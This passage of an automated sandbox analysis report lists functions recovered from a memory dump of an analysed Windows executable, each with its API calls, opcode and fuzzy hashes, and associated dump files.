                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                      • Opcode ID: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                                                                      • Instruction ID: 12d9cbd333469b35ebce06d581e83ce10451d2d381d02456cf870b2c2c34d416
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA318BBA705104EFD708CB5CDE89E69B7F9EB893087045025E812D7360E6F5EE14CB55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FC8A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BinaryCryptString
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 80407269-0
                                                                                                                                                                                                                      • Opcode ID: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                                                                      • Instruction ID: 62de5bec956a169481a5778194fdf1df57051168b430666ee5781268b5f467f0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0B475108605BFD3009F26DC85DAB73ADEB88784B110029F9468B391EBB4BC008B65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 0040164E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1778838933-0
                                                                                                                                                                                                                      • Opcode ID: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                                                                      • Instruction ID: 5146c5ff74eb99c3e513b584e61ba0d8331e3ddd70afdd09c52295fb5902dc9f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5E09AB1752321AFE320CF69CC85F233BAEEB89A20B008060BA00C7351D574EC0086A4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                      • Instruction ID: 089dadb44dc18b0797678ef5ba442c8809652ba94fb7cfa67b65c038052ec9a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE012362163549FC614CF18D8D4E16B3A9EF8AA54B1B446CD50257742D620ED10CB64
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                      • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                      • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0041E204
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0041E224
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041E254
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041E26F
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(0067CCAB,0067CCAB), ref: 0041E29F
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E301
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E320
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0041E33C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Heap$Free$AllocDeleteFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1985952241-0
                                                                                                                                                                                                                      • Opcode ID: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                                                                      • Instruction ID: 24bc4b787eba163100fbfc58756f5204999f887e60b27380e355edf6f9f48f95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91410579601204AFC704DF68EDD596AB7B8FF986007080065ED05E7371EAB4FE12DB6A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                                                                                      • Opcode ID: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                                                                      • Instruction ID: 67b5a4a5b04daad7a95f60bd5bee8071c83f245bd0fc84978605f90964d48742
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF14BB5A02204DFD208DF2CEDD8E29B7E5FB89304705456CED1597361EEB4E8528B2A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                                                                                      • Opcode ID: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                                                                      • Instruction ID: 2d8285d9dab4c637f8c7953bcd4f462bcb5e2ae0e6670f6db3990a7f1b9a1ef9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAC14D75B02208DFD208DF2CEDC8E2977E5FB893047040568ED55D7361EEB4E8568B2A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$memset
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 2788080104-4000257214
                                                                                                                                                                                                                      • Opcode ID: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                                                                      • Instruction ID: 371a5831eea4a37533a13f2d53e422aecd75df1e672aac2beebf4d7c28b1b7a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41316B76A002049FCB14DF68DC91BA977F4FB89704F04447AE909D7320EBB0AE44CB96
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$memset
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 2788080104-4000257214
                                                                                                                                                                                                                      • Opcode ID: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                                                                      • Instruction ID: 114670f2cd88bf99f37d533532433d574fa85a0011b7eefcf1e9e4fcfdc3aaaf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62317CB5A002049FDB14DF68DC91B9977F9EF89704F0845AAED06D7320E7B0AE44CB86
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00442CA8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00442CF1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                                                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                                                                      • API String ID: 190572456-1775429166
